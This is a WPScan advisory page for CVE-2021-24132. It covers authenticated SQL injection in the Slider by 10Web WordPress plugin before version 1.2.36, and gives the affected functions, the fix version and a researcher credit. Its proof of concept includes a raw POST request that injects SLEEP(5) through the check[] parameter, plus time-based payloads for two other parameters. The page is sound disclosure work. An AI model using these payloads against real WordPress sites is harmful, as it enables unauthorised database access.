WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection

Description

The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if "Role Options" is turn on for other users) to perform a SQL Injection attacks.

Proof of Concept

Vulnerable param: `check[]`
Vulnerable function: WDW_S_Library::get

```
POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

s=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate&current_id=
```

Other SQLi:

- File: admin/models/WDSModelWDSExport.php
- Function: export_full
- Params: slider_ids_string
- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5

- File: admin/controllers/Sliders.php
- Function: save_slider_db
- Params: del_slide_ids_string
- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5 

Affects Plugins

slider-wd
Fixed in version 1.2.36

References

CVE
CVE-2021-24132
URL
https://plugins.trac.wordpress.org/changeset/2389754

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)

Submitter

Nguyen Anh Tien

Submitter website
https://research.sun-asterisk.com/
Submitter twitter
https://twitter.com/vigov5
Verified

Yes

WPVDB ID
c1f45000-6c16-4606-be80-1938a755af2c

Timeline

Publicly Published

2020-09-29 (about 1 years ago)

Added

2020-09-29 (about 1 years ago)

Last Updated

2021-01-21 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us